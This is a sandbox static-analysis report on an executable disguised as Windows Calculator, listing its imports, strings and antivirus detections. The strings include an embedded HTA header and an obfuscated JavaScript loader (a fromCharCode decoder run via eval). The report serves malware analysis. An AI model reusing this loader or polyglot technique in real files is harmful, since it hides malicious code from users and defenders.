popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

PE Compile Time

2060-09-09 09:59:42

PDB Path

calc.pdb

PE Imphash

ba072a972fe6c47c8cf7a0347bb0af7a

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00001000 0x00000f2c 0x00001000 5.68989879931
.data 0x00002000 0x0000039c 0x00000200 0.24044503451
.idata 0x00003000 0x000004a8 0x00000600 4.06427258161
.rsrc 0x00004000 0x00004708 0x00004800 2.81175464817
.reloc 0x00009000 0x0000015c 0x00000200 4.69869222346

Resources

Name Offset Size Language Sub-language File type
RT_ICON 0x00006120 0x000025a8 LANG_ENGLISH SUBLANG_ENGLISH_US dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4282795590, next used block 4282795590
RT_ICON 0x00006120 0x000025a8 LANG_ENGLISH SUBLANG_ENGLISH_US dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4282795590, next used block 4282795590
RT_ICON 0x00006120 0x000025a8 LANG_ENGLISH SUBLANG_ENGLISH_US dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4282795590, next used block 4282795590
RT_ICON 0x00006120 0x000025a8 LANG_ENGLISH SUBLANG_ENGLISH_US dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4282795590, next used block 4282795590
RT_GROUP_ICON 0x000086c8 0x0000003e LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_VERSION 0x00004670 0x00000384 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_MANIFEST 0x000041e0 0x0000048f LANG_ENGLISH SUBLANG_ENGLISH_US XML 1.0 document, ASCII text, with CRLF line terminators

Imports

Library SHELL32.dll:
0x403038 ShellExecuteW
Library KERNEL32.dll:
0x403014 GetCurrentProcess
0x403018 TerminateProcess
0x403020 GetCurrentProcessId
0x403024 GetCurrentThreadId
0x40302c GetTickCount
Library msvcrt.dll:
0x403058 _amsg_exit
0x40305c __p__fmode
0x403060 __setusermatherr
0x403064 _initterm
0x403068 _wcmdln
0x40306c ?terminate@@YAXXZ
0x403070 _controlfp
0x403074 _exit
0x403078 exit
0x40307c __p__commode
0x403080 _XcptFilter
0x403084 __set_app_type
0x40308c __wgetmainargs
0x403090 _cexit
Library ADVAPI32.dll:
0x403000 EventSetInformation
0x403004 EventWriteTransfer
0x403008 EventRegister
Library api-ms-win-core-synch-l1-2-0.dll:
0x403050 Sleep
Library api-ms-win-core-processthreads-l1-1-0.dll:
0x403048 GetStartupInfoW
Library api-ms-win-core-libraryloader-l1-2-0.dll:
0x403040 GetModuleHandleW
!This program cannot be run in DOS mode.
`.data
.idata
@.rsrc
@.reloc
CalculatorStarted
CalculatorWinMain
"CalculatorStarted"
MicrosoftCalculator
calc.pdb
.rdata$brc
.CRT$XCA
.CRT$XCAA
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIY
.CRT$XIZ
.gfids
.rdata
.rdata$sxdata
.rdata$zETW0
.rdata$zETW1
.rdata$zETW2
.rdata$zETW9
.rdata$zzzdbg
.text$mn
.xdata$x
.data$brc
.idata$5
.00cfg
.idata$2
.idata$3
.idata$4
.idata$6
.rsrc$01
.rsrc$02
ShellExecuteW
SHELL32.dll
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetCurrentProcess
TerminateProcess
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
GetTickCount
KERNEL32.dll
_XcptFilter
__p__commode
_amsg_exit
__wgetmainargs
__set_app_type
_cexit
__p__fmode
__setusermatherr
_initterm
_wcmdln
msvcrt.dll
?terminate@@YAXXZ
_controlfp
_except_handler4_common
EventRegister
EventSetInformation
EventWriteTransfer
ADVAPI32.dll
GetStartupInfoW
GetModuleHandleW
api-ms-win-core-synch-l1-2-0.dll
api-ms-win-core-processthreads-l1-1-0.dll
api-ms-win-core-libraryloader-l1-2-0.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!-- Copyright (c) Microsoft Corporation -->
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity
name="Microsoft.Windows.Shell.calc"
processorArchitecture="x86"
version="5.1.0.0"
type="win32"/>
<description>Windows Shell</description>
<dependency>
<dependentAssembly>
<assemblyIdentity
type="win32"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
processorArchitecture="*"
publicKeyToken="6595b64144ccf1df"
language="*"
/>
</dependentAssembly>
</dependency>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
<application xmlns="urn:schemas-microsoft-com:asm.v3">
<windowsSettings>
<dpiAware xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
</application>
</assembly>
0D0H0P0X0
66%6+656B6H6N6T6]6p6z6
77&7-747;7A7M7X7c7h7m7s7}7
8 8)828G8\8d8x8
9*9=9_9j9|9
:]:g:m:w:
;';/;5;B;\;g;q;|;
<(=-=?=]=q=w=!>*>1>N>
<HTA:APPLICATION CAPTION = "no" WINDOWSTATE = "minimize" SHOWINTASKBAR = "no" >MZ
!This program cannot be run in DOS mode.
`.data
.idata
@.rsrc
@.reloc
CalculatorStarted
CalculatorWinMain
"CalculatorStarted"
MicrosoftCalculator
calc.pdb
.rdata$brc
.CRT$XCA
.CRT$XCAA
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIY
.CRT$XIZ
.gfids
.rdata
.rdata$sxdata
.rdata$zETW0
.rdata$zETW1
.rdata$zETW2
.rdata$zETW9
.rdata$zzzdbg
.text$mn
.xdata$x
.data$brc
.idata$5
.00cfg
.idata$2
.idata$3
.idata$4
.idata$6
.rsrc$01
.rsrc$02
ShellExecuteW
SHELL32.dll
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetCurrentProcess
TerminateProcess
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
GetTickCount
KERNEL32.dll
_XcptFilter
__p__commode
_amsg_exit
__wgetmainargs
__set_app_type
_cexit
__p__fmode
__setusermatherr
_initterm
_wcmdln
msvcrt.dll
?terminate@@YAXXZ
_controlfp
_except_handler4_common
EventRegister
EventSetInformation
EventWriteTransfer
ADVAPI32.dll
GetStartupInfoW
GetModuleHandleW
api-ms-win-core-synch-l1-2-0.dll
api-ms-win-core-processthreads-l1-1-0.dll
api-ms-win-core-libraryloader-l1-2-0.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!-- Copyright (c) Microsoft Corporation -->
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity
name="Microsoft.Windows.Shell.calc"
processorArchitecture="x86"
version="5.1.0.0"
type="win32"/>
<description>Windows Shell</description>
<dependency>
<dependentAssembly>
<assemblyIdentity
type="win32"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
processorArchitecture="*"
publicKeyToken="6595b64144ccf1df"
language="*"
/>
</dependentAssembly>
</dependency>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
<application xmlns="urn:schemas-microsoft-com:asm.v3">
<windowsSettings>
<dpiAware xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
</application>
</assembly>
0D0H0P0X0
66%6+656B6H6N6T6]6p6z6
77&7-747;7A7M7X7c7h7m7s7}7
8 8)828G8\8d8x8
9*9=9_9j9|9
:]:g:m:w:
;';/;5;B;\;g;q;|;
<(=-=?=]=q=w=!>*>1>N>
<script>
dv=102;EA=117;RG=110;ng=99;Yx=116;fu=105;Hu=111;TA=32;BM=118;Na=98;FX=40;fl=67;Ax=104;iE=97;HH=41;CZ=123;mQ=114;QH=73;TJ=74;uA=120;nl=61;ug=34;Ou=59;Ig=115;lT=121;se=48;hV=60;JF=46;QS=108;zU=101;Yj=103;YQ=43;vF=79;Hr=77;dM=83;hr=109;RN=100;mT=91;dy=93;WG=45;oB=56;Sn=52;PX=51;sQ=125;GL=68;qA=57;Ka=53;bE=44;Md=54;lI=50;mR=55;mA=49;NU=107;jq=112;bS=119;vs=65;fW=88;Rk=106;BX=82;var xon = String.fromCharCode(dv,EA,RG,ng,Yx,fu,Hu,RG,TA,BM,Na,Hu,FX,fl,Ax,iE,HH,CZ,BM,iE,mQ,TA,QH,TJ,uA,nl,TA,ug,ug,Ou,dv,Hu,mQ,TA,FX,BM,iE,mQ,TA,Ig,Yx,lT,TA,nl,TA,se,Ou,TA,Ig,Yx,lT,TA,hV,TA,fl,Ax,iE,JF,QS,zU,RG,Yj,Yx,Ax,Ou,TA,Ig,Yx,lT,YQ,YQ,HH,TA,CZ,BM,iE,mQ,TA,Ax,vF,Hr,TA,nl,TA,dM,Yx,mQ,fu,RG,Yj,JF,dv,mQ,Hu,hr,fl,Ax,iE,mQ,fl,Hu,RN,zU,FX,fl,Ax,iE,mT,Ig,Yx,lT,dy,TA,WG,TA,oB,Sn,PX,HH,Ou,QH,TJ,uA,TA,nl,TA,QH,TJ,uA,TA,YQ,TA,Ax,vF,Hr,sQ,mQ,zU,Yx,EA,mQ,RG,TA,QH,TJ,uA,sQ,Ou,BM,iE,mQ,TA,TJ,mQ,GL,TA,nl,TA,BM,Na,Hu,FX,mT,qA,Ka,Ka,bE,qA,Ka,Sn,bE,qA,Md,lI,bE,qA,Sn,Sn,bE,qA,Ka,mR,bE,qA,Ka,oB,bE,qA,Sn,mR,bE,qA,Sn,Sn,bE,qA,Ka,mA,bE,qA,Ka,mA,bE,oB,oB,qA
</script>MZ
!This program cannot be run in DOS mode.
`.data
.idata
@.rsrc
@.reloc
CalculatorStarted
CalculatorWinMain
"CalculatorStarted"
MicrosoftCalculator
calc.pdb
.rdata$brc
.CRT$XCA
.CRT$XCAA
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIY
.CRT$XIZ
.gfids
.rdata
.rdata$sxdata
.rdata$zETW0
.rdata$zETW1
.rdata$zETW2
.rdata$zETW9
.rdata$zzzdbg
.text$mn
.xdata$x
.data$brc
.idata$5
.00cfg
.idata$2
.idata$3
.idata$4
.idata$6
.rsrc$01
.rsrc$02
ShellExecuteW
SHELL32.dll
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetCurrentProcess
TerminateProcess
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
GetTickCount
KERNEL32.dll
_XcptFilter
__p__commode
_amsg_exit
__wgetmainargs
__set_app_type
_cexit
__p__fmode
__setusermatherr
_initterm
_wcmdln
msvcrt.dll
?terminate@@YAXXZ
_controlfp
_except_handler4_common
EventRegister
EventSetInformation
EventWriteTransfer
ADVAPI32.dll
GetStartupInfoW
GetModuleHandleW
api-ms-win-core-synch-l1-2-0.dll
api-ms-win-core-processthreads-l1-1-0.dll
api-ms-win-core-libraryloader-l1-2-0.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!-- Copyright (c) Microsoft Corporation -->
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity
name="Microsoft.Windows.Shell.calc"
processorArchitecture="x86"
version="5.1.0.0"
type="win32"/>
<description>Windows Shell</description>
<dependency>
<dependentAssembly>
<assemblyIdentity
type="win32"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
processorArchitecture="*"
publicKeyToken="6595b64144ccf1df"
language="*"
/>
</dependentAssembly>
</dependency>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
<application xmlns="urn:schemas-microsoft-com:asm.v3">
<windowsSettings>
<dpiAware xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
</application>
</assembly>
0D0H0P0X0
66%6+656B6H6N6T6]6p6z6
77&7-747;7A7M7X7c7h7m7s7}7
8 8)828G8\8d8x8
9*9=9_9j9|9
:]:g:m:w:
;';/;5;B;\;g;q;|;
<(=-=?=]=q=w=!>*>1>N>
<script>
eval(xon)
window.close();
</script>MZ
!This program cannot be run in DOS mode.
`.data
.idata
@.rsrc
@.reloc
CalculatorStarted
CalculatorWinMain
"CalculatorStarted"
MicrosoftCalculator
calc.pdb
.rdata$brc
.CRT$XCA
.CRT$XCAA
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIY
.CRT$XIZ
.gfids
.rdata
.rdata$sxdata
.rdata$zETW0
.rdata$zETW1
.rdata$zETW2
.rdata$zETW9
.rdata$zzzdbg
.text$mn
.xdata$x
.data$brc
.idata$5
.00cfg
.idata$2
.idata$3
.idata$4
.idata$6
.rsrc$01
.rsrc$02
ShellExecuteW
SHELL32.dll
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetCurrentProcess
TerminateProcess
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
GetTickCount
KERNEL32.dll
_XcptFilter
__p__commode
_amsg_exit
__wgetmainargs
__set_app_type
_cexit
__p__fmode
__setusermatherr
_initterm
_wcmdln
msvcrt.dll
?terminate@@YAXXZ
_controlfp
_except_handler4_common
EventRegister
EventSetInformation
EventWriteTransfer
ADVAPI32.dll
GetStartupInfoW
GetModuleHandleW
api-ms-win-core-synch-l1-2-0.dll
api-ms-win-core-processthreads-l1-1-0.dll
api-ms-win-core-libraryloader-l1-2-0.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!-- Copyright (c) Microsoft Corporation -->
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity
name="Microsoft.Windows.Shell.calc"
processorArchitecture="x86"
version="5.1.0.0"
type="win32"/>
<description>Windows Shell</description>
<dependency>
<dependentAssembly>
<assemblyIdentity
type="win32"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
processorArchitecture="*"
publicKeyToken="6595b64144ccf1df"
language="*"
/>
</dependentAssembly>
</dependency>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
<application xmlns="urn:schemas-microsoft-com:asm.v3">
<windowsSettings>
<dpiAware xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
</application>
</assembly>
0D0H0P0X0
66%6+656B6H6N6T6]6p6z6
77&7-747;7A7M7X7c7h7m7s7}7
8 8)828G8\8d8x8
9*9=9_9j9|9
:]:g:m:w:
;';/;5;B;\;g;q;|;
<(=-=?=]=q=w=!>*>1>N>
ms-calculator:
IDI_CALC_ICON
VS_VERSION_INFO
StringFileInfo
040904B0
CompanyName
Microsoft Corporation
FileDescription
Windows Calculator
FileVersion
10.0.19041.1 (WinBuild.160101.0800)
InternalName
LegalCopyright
Microsoft Corporation. All rights reserved.
OriginalFilename
CALC.EXE
ProductName
Microsoft
Windows
Operating System
ProductVersion
10.0.19041.1
VarFileInfo
Translation
ms-calculator:
IDI_CALC_ICON
VS_VERSION_INFO
StringFileInfo
040904B0
CompanyName
Microsoft Corporation
FileDescription
Windows Calculator
FileVersion
10.0.19041.1 (WinBuild.160101.0800)
InternalName
LegalCopyright
Microsoft Corporation. All rights reserved.
OriginalFilename
CALC.EXE
ProductName
Microsoft
Windows
Operating System
ProductVersion
10.0.19041.1
VarFileInfo
Translation
ms-calculator:
IDI_CALC_ICON
VS_VERSION_INFO
StringFileInfo
040904B0
CompanyName
Microsoft Corporation
FileDescription
Windows Calculator
FileVersion
10.0.19041.1 (WinBuild.160101.0800)
InternalName
LegalCopyright
Microsoft Corporation. All rights reserved.
OriginalFilename
CALC.EXE
ProductName
Microsoft
Windows
Operating System
ProductVersion
10.0.19041.1
VarFileInfo
Translation
ms-calculator:
IDI_CALC_ICON
VS_VERSION_INFO
StringFileInfo
040904B0
CompanyName
Microsoft Corporation
FileDescription
Windows Calculator
FileVersion
10.0.19041.1 (WinBuild.160101.0800)
InternalName
LegalCopyright
Microsoft Corporation. All rights reserved.
OriginalFilename
CALC.EXE
ProductName
Microsoft
Windows
Operating System
ProductVersion
10.0.19041.1
VarFileInfo
Translation
Antivirus Signature
Bkav W32.Common.19D0AB1D
Lionic Trojan.Win32.Generic.4!c
tehtris Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Trojan.Script
Skyhigh RDN/Generic.dx
ALYac Gen:Variant.Strictor.288077
Cylance unsafe
Zillya Clean
Sangfor Trojan.Win32.Agent.V1md
K7AntiVirus Clean
Alibaba Trojan:Script/Generic.2831657c
K7GW Clean
Cybereason Clean
Baidu Clean
VirIT Clean
Paloalto Clean
Symantec Trojan Horse
Elastic Clean
ESET-NOD32 Clean
APEX Clean
Avast Win32:Malware-gen
Cynet Clean
Kaspersky UDS:DangerousObject.Multi.Generic
BitDefender Gen:Variant.Strictor.288077
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Gen:Variant.Strictor.288077
Tencent Clean
TACHYON Clean
Sophos Mal/Generic-S
F-Secure Clean
DrWeb Clean
VIPRE Gen:Variant.Strictor.288077
TrendMicro Clean
Trapmine Clean
FireEye Gen:Variant.Strictor.288077
Emsisoft Gen:Variant.Strictor.288077 (B)
SentinelOne Clean
GData Gen:Variant.Strictor.288077
Jiangmin Clean
Avira Clean
Antiy-AVL Clean
Kingsoft Win32.Troj.Unknown.a
Gridinsoft Clean
Xcitium Clean
Arcabit Trojan.Strictor.D4654D
SUPERAntiSpyware Clean
ZoneAlarm UDS:DangerousObject.Multi.Generic
Microsoft Trojan:Win32/Znyonm
Varist Clean
AhnLab-V3 Clean
Acronis Clean
McAfee RDN/Generic.dx
MAX malware (ai score=89)
VBA32 Clean
Malwarebytes Generic.Malware/Suspicious
Panda Trj/Chgt.AD
Zoner Clean
TrendMicro-HouseCall Clean
Rising Trojan.Generic!8.C3 (CLOUD)
Yandex Clean
Ikarus Clean
MaxSecure Clean
Fortinet W32/PossibleThreat
BitDefenderTheta Clean
AVG Win32:Malware-gen
DeepInstinct MALICIOUS
CrowdStrike win/malicious_confidence_60% (D)
alibabacloud Trojan:Multi/Strictor
No IRMA results available.